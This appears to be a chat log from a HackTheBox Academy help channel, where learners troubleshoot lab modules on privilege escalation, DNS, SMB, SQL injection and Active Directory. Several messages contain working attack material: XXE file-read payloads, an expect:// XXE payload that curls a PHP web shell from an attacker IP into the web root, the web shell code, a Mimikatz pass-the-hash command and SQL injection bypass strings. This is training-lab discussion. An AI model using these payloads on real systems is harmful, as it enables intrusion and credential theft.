Yeah you helped, this situation also taught me something
yeah man they do put rabbitholes often like that im struggling myself rn for a while with an assessment and i cant figure it out
Need help with Perm Escalation
awesome
what module is that
I got first flag trying to get second i need to escalate to root access
the machine is 6.1.0-10 linux kernel
but i cant find any exploits for this version
its been a really long time... but iirc there was a script in that module
starts with l
you're going to run it
where the script
an enumeration script
a quick google search says "LinEnum"
Do i have to run a reverse shell and then run the command thru my reverse shell?
its been a really long time but iirc that module also walks through file transfers between hosts
so follow the steps to transfer the enum script from your host to the target machine
Had nothing to do with enumerating lol you tossed me in the complete different direction
Simply just had to copy the pub rsa token from the root & copy it over to my terminal and login with it as the root user
well next time pay attention to the module
Don't give the wrong advice maybe just be quiet
theres no such thing
wrong advice is just creative reinterpretation
Very much so a thing
You're telling me to enumerate with a script when i can't even install a script let alone move anywhere in the machine without root access
and in my defense i havent done that module
You're a funny troll
next time say thank you
Yes I am still stuck I don't know how to find product id
You can send me a DM.
Hi everyone, I'm doing the SMB Footprinting lab. I'm stuck at the 3rd question (Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer.).
I am using the pwnbox. I try to run CrackMapExec, but when I do that I get -bash: cme: command not found. I tried to install crackmapexec from source but that did not work. Does anyone have any idea if it is also possible without crackmapexec?
use netexec, crackmapexec has been deprecated since the module was written. An update is apparently underway
same commands, just replacing the name
I just found the answer with rpcclient 🙂
thnx for helping!
I asked yesterday, could anyone take just a quick look at this? I really can't figure out the problem, please and thanks.
No
Hi all! I hope you're all doing good.
I'm stuck at "Understanding Log Sources & Investigating with Splunk" module. The questions about the IP addresses of the C2 servers.
Can someone help ? a little nudge ?
Module: WinPrivEsc
Section: DNSAdmins
Any alternative ways of building dlls other than legacy VisualStudio?
msfvenom isn't doing great, but I couldn't have VisualStudio target the correct legacy version of various codes to build the revshell dll plugin for the DNS server (It can't even complete the build)
The way the exploit works is interesting
But it is tough af to build a working one (without blowing the dns server up)
im also looking at ||Ippsec's resolute walkthrough|| and tried to replicate his way...
Sadly ms doesn't seem to release a lot of those legacy visualstudios
I went through the section via msfvenom luckily
gotta learn more about building dlls, or even just c++
Hello! Looking for some help on the Login Brute Forcing -Brute Force Attack module. Ran the python script to obtain the pin and flag. I went through 0000-9999, no hits. Checked the walkthrough guide and the flag isn't given.
check IP address and port number within the script
it's not actually going to take this long right
that's how long it will take to try all passwords, hopefully it is done faster
ok how am i supposed to do this then because the lab only stays open for 6 hours max and this is 180k passwords
i can't make hydra go any faster
medusa is slow as shit as well
oh wait i have an idea
Can anyone help me with the linux fundamentals please. I am having a very hard time
you can look into increasing the amount of threads, but expect it to not take the whole time but finish after 5-10% of the passwords
you can also split the wordlist into smaller ones and try them one at a time (for example try all 8 character pws first, then all 9 character ones, etc)
yep just did that
well i just split them evenly into 10 wordlists but either way that's what i meant by this
You figure out your issue? I think I have the same problem because I can't seem to submit the correct answer either.
For the Linux Privilege Escalation module, specifically the Environment Enumeration one could use a bit better explaining on what the question is asking for tbh
Idk if it's the right place to ask it, i'm doing the web attacks module and i don't understand too much about the local file disclosure, i tried with the http python server but in BurpSuite i can't see the response from the server or it's empty
i mean with xxe
Hey, i'm in sqlmap essentials / OS Exploitation.. the question is "Use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host." i get an os-shell and can see all the files, the flag.txt is the same as for the question before and i've looked at all other files in /var/www/html but i can't find the flag.. the hint is: The flag is in a very common directory! but it is just one dir inside and it is empty, i can't go to any other dir.. so what am i doing wrong?
check root dir
what?
can't get to it.. just saying: No output or ommand standard output: 'sh: 1: cd: can't cd to root'
I mean, in one example the module tells you to create a local dtd file so the server can reference it through a curl but when i do it the response from the server came empty
what user do you have? run whoami
im www-data
dtd file sounds like xxe no?
Yep xxe
what is your payload
try to run find / -name "flag.txt" 2>/dev/null xD
done it already
No output
try upgrade your shell
does the server have python?
```xml
<!DOCTYPE email [
<!ENTITY % begin "<![CDATA[">
<!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php">
<!ENTITY % end "]]>">
<!ENTITY % xxe SYSTEM "http://10.10.14.127:8000/xxe.dtd">
%xxe;
]>
```
The ip is just a placeholder
its been a while since i did xxe right, but aren't you supposed to reference a local dtd file?
Yep, the local one is supposed to contain this: <!ENTITY joined "%begin;%file;%end;">
yes.. i can do another rev-shell but that is not what this question tells me to do, and i get the files in www/html like i meant to.. i think something is wrong...
Hey could someone help me with the intro to windows evasion static analysis section? i encode a payload using aes encryption through cyber chef but using the decoding code given in this section what will be the key to decrypt it
```xml
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
<!ENTITY % constant 'aaa)>
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///patt/%file;'>">
%eval;
%error;
<!ELEMENT aa (bb'>
%local_dtd;
]>
```
what happens if you do this?
i did find / -name "flag.txt" 2>/dev/null and it is just /var/www/html/flag.txt so...
like i told you before, it is the wrong flag, it is the flag for question 1--
im not stupid
i know how to read the flag
if find doesn't find any more flags, i think you're out of luck no?
Reset the box, ive had to do that on occasion when something that should work doesnt tbh
why do you think i'm saying something is wrong?
im not, im saying you sound like you are out of luck.
hehe
im going to try it
thanx, going to try.. it happens some times some strange problems ..
It might not be called flag.txt, I’ve found that some flag files have random strings on the end.
Try updating your find command to look for -iname “flag*.txt”
How to check DNS of a website
by the way i dont understand it too much, i just got to the xxe topic 😅
dig or nslookup
grep -ir flag*.txt or just grep -ir *.txt to find all .txt files from root path
Yes, there are multiple ways to search for the file.
Issuer means what
You’ll want a -l on this so it restricts to filenames only and not file contents.
srry i just realized the one i was trying was the local one:
```xml
<!DOCTYPE email [
<!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'OUR_IP/shell.php'">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>
```
and this is the content of the shell.php: '<?php system($_REQUEST["cmd"]);?>'
the shell is not good.. can't use grep, can't use cd etc...
get a better shell
ok i see what you are trying to do, do you host your shell on a local web server? does your payload connect? do you see a callback?
It is the only way, but the question tells me to use --os-shell from sqlmap, so it is what i'm supposed to use, not another shell
hacking the challenge is allowed.. you are training to be a hacker no? why not just solve the challenge any way possible? thats what a hacker would do right? the challenge is not to do what you are told, the challenge is to pwn the server..
no reason to follow the rules mate
Sure sure, done it before so why not.. i know, it is about to solve it, and no matter how...
attaboy
my shell is on the local web server because i tested the link with the vpn ip and i see the callback with a 200 OK response from the server but i don't know how to put a command because the shell.php doesn't have a command inside like ls or whoami
ok so what you need to do is you need to navigate to the webserver and write ?cmd=whoami
you are uploading a php web shell using your xxe payload
so you need to execute server side commands using that webshell
```php
<?php system($_REQUEST["cmd"]);?>
```
it will not have a gui, it will only output raw cmd responses
you managed to do it? I havent seen any response from server while trying to do this thing
Im just about to try it again
use the browser to go to http://TARGET_IP.whatever/php.shell?cmd=whoami or something like that, whatever the domain is and path
if you see a 200 OK the webshell is downloaded
i was about to ask about one method of advanced xxe that doesnt seem to work but i saw your thread 😄
if its on the root folder would be like http ://1.1.1.1/shell.php?cmd=whoami ?
i guess, is there anything there?
nope, im going to try with php.shell instead of shell.php
yea, you need to use whatever your webshell is named
if you named it thomas-the-tank-engine.php you need to call that 😛
hahaha i mean its called shell.php but its still not working
Then you may be doing something wrong
yea
are you certain you got the server to download the webshell from your web server?
i guess not, i got a 404 when i enter the http://ip/shell.php
yea then it's definitely not on that location or not downloaded at all
but the link to the shell in the payload is correct and i send it multiple times
what does your webserver say when you upload your xxe payload..
also i recommend using a arb file read xxe payload instead of a download payload at stage one, just to confirm that your xxe payload actually works.
Ah doing xxe
if you can read /etc/passwd, you know you have xxe for sure. then you can start doing file download after.
yea its local dtd file inclusion for xxe
i tested with other values than the "curl" command and it worked, the "company" and that worked
the company variable i mean
Id reread how the dtd works
dtd is just the file reference
i can read /etc/passwd but i cant do the webshell i guess
And understand why company works
in the xml i put the "&company;" and i can read passwd but i don't download the payload i think
Hey guys I am seeking help in the Intro to Assembly skill assessment
you run a python web server in the same folder as your shell.php file right?
Is anyone having issues trying to connect to the HackTheBox website itself? I can connect to everything besides the website on my VM and host OS.
yep, and it get download when i enter the ip:server_port/shell.php in my browser
Connect to any other website I mean
the shell.php should then land somewhere on the server and you should be able to connect to it i suppose
should i try fuzz directories till i find the shell.php in the webserver to be sure that got uploaded?
yea you can try that
i don't understand that either, why not just read the flag file
also, with curl you might be able to determine the output folder
you could also try wget instead
wget -P /var/www/html $url
That module was a blur
curl -o /var/www/html $url should work too
```xml
<!DOCTYPE email [
<!ENTITY company SYSTEM "expect://curl$IFS-o$IFS/var/www/html/shell.php$IFS'OUR_IP/shell.php'">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>
```
Were you able to find that second flag?
No, i'm trying to upload another shell with --file-write like it says in the module but i can't get it working.. I'm not giving up, but i think the solution is simpler than what i'm doing now..
Just list out /
See if anything is there.
says No output
Try to list it out with more than just ls
get some dirs but can't get in, all is root, i'm www-data
Can you DM your output?
sure
I've tried a lot and it's still not working, tomorrow i'll keep trying but still thanks for your time :33
Hi anyone tried MonitorsThree htb
My honest reaction to the facts presented above 0:20 & 0:40 https://music.youtube.com/watch?v=7NMyvtUu9-A&feature=shared
when a module says "1 Day" (work day?) to complete, does that mean 8 hours or 24 hours?
I think every module took me longer just based on my note taking.
8 hours
Equate 1 day to working day
Hey Jeff, I have been working with this module for some time now.. And it seems that im stuck here aswell. Can I talk to you for some guidance on this?
Thanks
Where are you running into issues?
Not password attacks 😭
an 8 hour module will be done in more than 8 hours 👍
Right now I am cheating in the privesc module idc anymore
instead of doing the things in the section im skipping and just using a previous exploit xD
stealing SAM
1 method to get it done faster
lol ill come back someday im sure, but the title of the section is Miscellaneous techniques
who got it before me? 😂 😂 😂 😂
I am tired of reading the word miscellanous
at this portion of the module, the given script has a small bug i think. At least for me it did not work ("out of range error"). I had to manually fix it. Lost some time there
@everyone
Oh I’ll definitely be taking more than the projected time lol. I’m considering doing the modules twice even depending on how much I struggle. Just wanted to know what exactly I’m up against when the 1-2 day modules start.
on Access Control List (ACL) Abuse Primer i am on the last question and i feel getting it correct is just the way its worded. I know the answer but not how htb wants it put into the space. anyone have any insight
no
by the way a tip on the final assessment, use lazagne.exe . That one little thing kept me from progressing for 5 days.
youll know when to use it
Thanks havent started it saw 7days and I was like oh boy
that's nothing compared to the windows privesc
windows privesc is now officially driving me insane
We ll make it out brah
😭
Yes, it seems to not work. I'll patch in a few.
You were definitely the first one to finish the module, the other guy was from the academy team itself 🙂
My trying to survive at password attacks final labs 💀
oh man wait till you have to leverage a command injection vulnerability just to get in
i finally reached the first assessment after several days
hi folks
on the crackmap exec module. May i please get some hint on this question: **Up to how many RIDs does --rid-brute list by default? **
I tried several combinations of || --help || with main command and none is showing any default value.
ask the question
windows fundamentals module, when i try to RDP to it, as it's asking, it says the system is offline
have you restarted the machine
yes
ill try that rn
still nothing, this is what i get,
what section
introduction to windows
remove the space for the user and password , add a : for the ip
idk its the code that the lesson told me to paste in
remove the spaces and add the : for /v
what is the COM port for juicy potato?
Oh, man! Another module! 
broooo it was the $ 0_0
lmfao
wait nvm
its still fcked
There's a lot wrong there with your command. "xfreerdp" is the command it should start with, not the "priks" part.
im using this now: xfreerdp /v:10.129.75.12 /u: htb-student /p: Academy_WinFun!
comes back as an error Invalid sigil
and username
you shouldn't have any extra spaces
only use a single space to separate the command, parameters, and values
The skills assessment for Windows privesc module is fun.
but the rest of the module is such a snorefest.
After performing a zone transfer for the domain inlanefreight.htb on the target system, how many DNS records are retrieved from the target system's name server? Provide your answer as an integer, e.g, 123.
I would like to know what would be the command
the module/section didn't go over it?
stuck in the zone transfer segment of Information Gathering - Web Edition
yah there was one command but I tried it all the ways i could. but couldn't find the answer
so you ran the command successfully and got the results but were unable to count it? not sure what you mean here
There may be another zone to transfer to and add
yah I ran over the command. But couldn't count
One more thing is : I'm not quite sure about the command.
dig axfr domain.tld @nameserver/IP
yah it worked
I ran this command but my position was different
I used ip address firstly & then used the domain
that's why it didn't show up ig
do it like the section shows, the nameserver comes after the @. in marcielee's example the 'domain.tld' is the target domain
What is wrong with this command? sekurlsa::pth /user:david /rc4:c39f2beb3d2ec06a62cb887fb391dee0 /domain:INLANEFREIGHT.HTB /run:cmd.exe it spawns a cmd then I check the user and it is still administrator on ms01 instead of david

Pretty sure that’s how it works
yeah I know right? Wonder whats wrong with it
You should still have the rights David tho
You can’t list the David shares?
I think ill be able to list david shares once I connect to the domain controller as david and do dir\\dc01\david
I wont be able to list david shares while Im on ms01 and logged in as administrator right?
You are admin with David’s rights now
Administrator and David are two different accounts
what do you mean by this?
Have you tried listing the share
```
Access is denied.
```
I am currently logged in as Administrator on MS01, I think I wont be able to list David's share if Im not connected to DC01 right?
is DC01 accessible externally or it can only be accessed by the MS01?
You are on a domain joined machine
I guess I am. Again, currently logged in on the MS01 as Administrator account.
it spawns a CMD. I check using whoami and find out the current user is still Administrator and the machine is still MS01
It’s still gonna say that you’re admin but you will also have David’s domain rights
Bro. You're mixing things up.
They show the same example in the section with julio
They are still admin but can list shares
I run the command as Administrator like I said. The command was supposed to connect to DC01 as user David.
hmm okay.
ill see what I can do
I just did it no problem
I’m still the admin user, I just have David’s rights
oh I see
can you list dir \\dc01\david ?
Go look at the julio example again
Yes
this is the case. Was confused on the spawned CMD because whenever I check it still shows MS01 and the user is still Administrator
was able to list the dc01 now
careful not to reveal spoilers
Hi guys,
I am doing the AD Enumeration & Attacks - Skills Assessment Part II
For the 8th question: Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host. I get the following hash for Administrator. But when i do use it to login, it doesn't work. Am i doing anything wrong here?
Have you tried local auth
how are u logging in
yeah try local-auth
careful to not spoil contents of the skill assessment like that
bro typed the hash 💀
my bad
What are the best & most helpful & most in-depth books you all would recommend on ethical hacking?
Are Peter Kim's books any good?
I wouldn't. I'd recommend HTB's Academy. Peter Kim's books are great but they're pretty dated.
that's the problem with books vs online platforms that can keep up
I'm trying to do SQL Injection Fundamentals but I'm getting this error when attempting to connect to the mysql database
mysql -u root -h 94.237.59.207 -P 42397 -p 1 ↵ mysql: Deprecated program name. It will be removed in a future release, use '/usr/bin/mariadb' instead Enter password: ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it
try --skip-ssl
It works
./kernal_exploit3: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./kernal_exploit3)
Why am I getting this error while solving the LPE kernel exploit module?
anybody?
The program you are trying to run is compiled in a way that it looks for the needed library (GLIBC_2.34 in this case) on the machine where it is executed. In your case the program was compiled on a machine that has GLIBC_2.34, but executed on a machine that doesn't have GLIBC_2.34 installed. You either need to compile it on the machine where you want to execute it, compile it on a machine that has the same version of GLIBC_2.34 as the target machine, or compile it statically linked, which means the program includes all the libraries it needs (but the file size is then ofc bigger).
I think in academy they expect you to build the exploit on the target machine
What's the command to view a txt file on Windows? Like "cat" on Linux
I tried it, didn't work for me
Then maybe you don’t have perms to read
```
10/18/2021 12:52 PM 14 flag.txt
1 File(s) 14 bytes
0 Dir(s) 30,582,730,752 bytes free
C:\>Type 14 flag.txt
Type 14 flag.txt
The system cannot find the file specified.
Error occurred while processing: 14.
flag.txt
```
🥲
I compiled it on my host and then transferred it to the target machine, but it's showing an unmatched library error
Yes, because your host has the library and the target doesn't. Either compile it on the target instead (if the target has a compiler installed), or compile it on your host with the -static option to include the library in the binary itself
lmt
Done. Thanks

For DNS footprinting I've actually answered all the questions except for the first one: "Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain." I'm missing something..
You are looking for the FQDN of the name server
Hm I did it by dig axfr and blindly inputting the value in the NS line, but originally I tried root.inlanefreight.htb as that is a value for the inlanefreight domain
hello
I don't understand why it's the FQDN of the nameserver
You're talking about the SOA record, right?
If so, then root.inlanefreight.htb is the e-mail address 😉
https://www.cloudflare.com/learning/dns/dns-records/dns-soa-record/
help me in Attacking Wi-Fi Protected Setup - Skills Assessment What is the WPS PIN for the WiFi network named HackTheBox-Corp?
I'm more trying to understand why the correct answer was the FQDN of the NS, rather than the FQDN from the other fields, except that it outputs as correct when you try it blindly
There is a script in one of the sections
You can try the approaches in that section
Did you generate PINs?
The question is a bit strangely formulated. You are looking for the FQDN for the name server
Yeah, I tried to make a bash script but it's still not working
Hm I see, so no @ but still an email. SOA is always an email though, I should know. Do you know if the intended method was to use dig axfr on the domain and IP? Is the FQDN for a domain usually the FQDN of its nameserver, like in this case?
Try again
okay I will
Yep I'm normally able to understand the materials and lab questions but this time I think the course didn't explain FQDN much at all except in a way that didn't help answer the first question
No, not every address in the SOA is an e-mail.
Take a look at the link above.
Nameservers are often named like this. But you can call it whatever you want (mysuperfancynameserver.domain.tld). With dig NS you should get the name.
A fully qualified domain name (FQDN), sometimes also called an absolute domain name, is a domain name that specifies its exact location in the tree hierarchy of the Domain Name System (DNS). It specifies all domain levels, including the top-level domain and the root zone. A fully qualified domain name is distinguished by its lack of ambiguity in...
```
SMB 10.129.202.85 445 ILF-DC01 [*] Windows 10.0 Build 17763 x64 (name:ILF-DC01) (domain:ILF.local)
error, desc = e.getErrorString()
^^^^^^^^^^^
ValueError: too many values to unpack (expected 2)
```
It's the same cmd as in the module. I don't get what's really causing the error
For reference, it's the Password Attacks module
Hey, did you end up finding the pw they were looking for? I tried the "easy" ones they mention (seasons/companyname + year and !) and don't feel like spending hours creating and bruteforcing possible pws
Use netexec instead of crackmapexec, cme is deprecated
I did ruler do not work
it doesn't ping right when you have the right password, try obvious stuff manually
directly on the web page
ew, alright, thanks for the hint!
no sweat
Module: Introduction to Threat Hunting & Hunting With Elastic, Hunting For Stuxbot
Task: Navigate to http://[Target IP]:5601 and follow along as we hunt for Stuxbot. In the part where default.exe is under investigation, a VBS file is mentioned. Enter its full name as your answer, including the extension.
I'm connected to the VPN, waited for at least 5 minutes and can't connect to the given IP / Port in firefox. Restarted the target twice with no luck. Tried to reach another host from a different module / task and that worked
No proxy configured in Firefox
attack! attack!
Module: Win Priv Esc
DNSAdmin and Print Operators
How do you get the correct version of VisualStudio to compile DLL payloads?
I don't think MS releases 2019 version out there for free
what do you mean
I'm in Getting Started, Page 7, Service Scanning
Service Scanning
```
jsp0511@htb[/htb]$ nmap -sV -sC -p- 10.129.42.253
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 ftp ftp 4096 Feb 25 19:25 pub
| ftp-syst:
| STAT:
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: PHP 7.4.3 - phpinfo()
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 233.68 seconds
```
Then the paragraph right below this says: Take OpenSSH, for example. We see the reported version is OpenSSH 8.2p1 Ubuntu 4ubuntu0.1. From inspection of other Ubuntu SSH package changelogs, we see the release version takes the format 1:7.3p1-1ubuntu0.1. Updating our version to fit this format, we get 1:8.2p1-4ubuntu0.1. A quick search for this version online reveals that it is included in Ubuntu Linux Focal Fossa 20.04.
My question is, where does the "Ubuntu SSH package changelogs, we see the release version takes the format 1:7.3p1-1ubuntu0.1" come from?
Why didn't you just paste the paragraph below that?
It comes from the Ubuntu package management system
blame debian for making these naming conventions so absurdly convoluted
this one?
However, it is worth noting that this cross-referencing technique is not entirely reliable, as it is possible to install more recent application packages on an older OS version. The script scan -sC flag causes Nmap to report the server headers http-server-header page and the page title http-title for any web page hosted on the webserver. The web page title PHP 7.4.3 - phpinfo() indicates that this is a PHPInfo file, which is often manually created to confirm that PHP has been successfully installed. The title (and PHPInfo page) also reveals the PHP version, which is worth noting if it is vulnerable.
I think what I'm asking is, if the nmap scan produced OpenSSH 8.2p1 Ubuntu 4ubuntu0.1, how in the world would I end up with seeing or finding release version 1:7.3p1-1ubuntu0.1 if the module didn't point it out? Does that clarify my confusion?
or is that version of OpenSSH only found on 1:7.3p1-1ubuntu0.1?
yes
nmap basically just extracted the banner string from the service that is what openssh advertises as its version
Ok I think, as you pointed out the naming being complicated, I confused the SSH version for the OS version
nmap does not look up or convert this version into a debian styled package format the operating system would use internally
the author of the module made a weird assumption
not sure i follow that
assuming you'd naturally cross reference the nmap banner with ubuntu debian style version without telling you how to connect the dots
ok yes
I can't make my VM with Parrot OS innit, can someone voc?
i already did one post
really stuck on this question
I tried this and no luck
and other payloads which still didnt work
Sorted
awesome
Did you check the port mentioned in the section for each webapp? You need to add the port to retrieve the flag.
Can I write in DM?
Think of it as 'Attacker.com:8011' will become '127.0.0.1:8011'. Does the webapp run on 8011?
Sure
anyone got a second to help me with a problem in acl enumeration?
don’t ask to ask
just ask
Using the skills learned in this section, enumerate the ActiveDirectoryRights that the user forend has over the user dpayne (Dagmar Payne). does this need to be done thru powershell command or thru the active directory gui?
powershell
Roger. I used the visuals from 2 lessons earlier to get to forend but am not able to get to the security tab so I figured it was PowerShell. Just wanted to make sure I wasn't missing something
hiya
I will ask once again for help on this, if anyone's got a solution pls tell me!
meh. Solution was easy... change vpn academy profile.
best to say which section you're on.. also those commands you used there, i never had to use them. i just stuck with what was in the module.
Are there plans to include cloud modules?
idk
Hey there, I'm on the skills assessment part, and I didn't stray from anything that was shown in the module but I'm still unable to complete the last question on this section for whatever reason
fair enough.. try to think about why you wouldn't be able to connect a device to wifi, but another device can..
I am on the attacking common services easy lab, I enumerated the user name but hydra keeps throwing an error when bruteforcing the password. I am using the Rockyou.txt.gz. I have decreased the threads and increased the delay but still getting [ERROR] all children were disabled due too many connection errors. Any advice?
.gz is a zip file.. did you unzip rockyou?
@cloud urchin No I didn't unzip it, I've ran it without unzipping it before without any issue.
oh interesting... then the error indicates a connection issue
Where I can found it
No clue, not on this server. What you’re asking for is also illegal
gotta think bigger, like where to find a link you can send someone and you get a billion dollars
I’ll erase mine for a billion dollars
Ahah, I tried that too, but there is a possibility that maybe I made a mistake in the process so I'll try doing this part again, thanks! I'll see if it works
Hey all. I'm working on the 'remote/reverse port forwarding with ssh' module and following along. When running the payload.exe from the windows host, I keep getting 'command shell session * is invalid and will be closed' from the meterpreter handler. I've tried a couple different payloads (reverse_tcp & meterpreter_reverse_tcp) instead of reverse_https with the same result. I'm assuming that since I see the attempted connection at all the reverse port forwarding is working. Anybody have any hints or tips?
Stay calm and remember that you're just a chill guy doing cybersecurity
I can't keep calm anymore
I'll take a look at this module as well since I haven't done it yet and come back later
Hi, I have a question regarding the SQL injection fundamentals module.
It says that the AND statement has the priority over the OR statement.
So if we face a login form with the query :
SELECT * FROM users WHERE username='' AND password =''
We should be able to inject the following way ?
Username : 'OR '1'='1
Password : whatever' OR 1=1 #
This is what I tried at first for the skills assessment module but it didn't work, so I'm wondering what I misunderstood.
NB : I completed the module now, I just want to have a better understanding
Hey! I am doing the Penetration Tester job role path and I'm currently doing the "Network Enumeration with Nmap" module. I'm at the Firewall and IDS/IPS Evasion medium lab and I just can't get the flag I'm supposed to. I even bought Annual Silver just so I could get the step-by-step solution. However, even with the step-by-step solution I can't get it to work, not even when copying and pasting the exact command, I just don't get the same result. Now I do have the answer from the solution but I would like to know why it's not working. Does anyone have any suggestions / explanations?
Q: After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer.
I tried ||sudo nmap -Pn --disable-arp-ping -p 53 -sU -sC targetIP||
you purchased a plan to get the step by step solution?
you purchased a whole years worth
Well not just for that, I also want to attempt the exam at one point anyways so I have a voucher now
what can I say, knowledge is more valuable than money for me
what does the hint say?
same
||During the meeting, the administrators talked about the host we tested as a publicly accessible server that was not mentioned before.||
Is HTB going to get any mobile hacking modules in academy? I would like to learn how to hack Android and iOS
that is weirdly vague
do a full udp port scan
Will try, I did forget to mention, I do get a version but it's not the right answer. I get NLnet Labs NSD, but the version in the solution is an actual HTB{} flag
iirc you would need to connect to that port using a tool like netcat
Looks like you didn't put the comment indicator in your payload after Username:'OR '1'=1. Make sure to leave space at the end of the command indicator. If done correctly, the rest of the query including the password field will be ignored.
did you read the message till the end?
Still a beginner so I may have done it wrong, but I did nc -N targetIP port -u
Didn't get a connection though
what port
did you even attempt a full port scan?
Yea I did, you did however just make me realise I should save the output in a file instead of running it over and over again